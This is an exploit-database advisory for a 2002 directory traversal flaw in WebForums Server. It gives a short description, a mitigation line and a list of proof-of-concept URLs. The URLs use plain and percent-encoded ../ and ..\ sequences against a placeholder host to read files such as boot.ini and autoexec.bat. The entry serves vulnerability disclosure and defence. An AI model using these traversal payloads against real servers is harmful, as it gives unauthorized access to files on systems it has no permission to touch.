header-logo
Suggest Exploit
vendor:
Server
by:
R00tCr4ck
4.3
CVSS
MEDIUM
Directory Traversal
22
CWE
Product Name: Server
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

WebForums Server Directory Traversal Vulnerability

It has been reported that WebForums Server does not properly handle some types of requests. Because of this, attackers may be able to gain access to files on the host server with the privileges of the web server process. Examples of directory traversal proof of concepts had been provided by R00tCr4ck <root cyberspy org>.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a filesystem operation.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7955/info

It has been reported that WebForums Server does not properly handle some types of requests. Because of this, attackers may be able to gain access to files on the host server with the privileges of the web server process.

http://www.example.com/../../../../autoexec.bat
http://www.example.com/../../../autoexec.bat
http://www.example.com/../../boot.ini
http://www.example.com/../../boot.ini
http://www.example.com/../../../boot.ini
http://www.example.com/../../../boot.ini

Additional directory traversal proof of concepts had been provided by R00tCr4ck <root cyberspy org>:

http://www.example.com/..\..\..\file.ext
http://www.example.com/../../../file.ext
or as encoded format:
http://www.example.com/%2E%2E%5C%2E%2E%5C%2E%2E%5Cfile.ext
http://www.example.com/%2E%2E%2F%2E%2E%2F%2E%2E%2Ffile.ext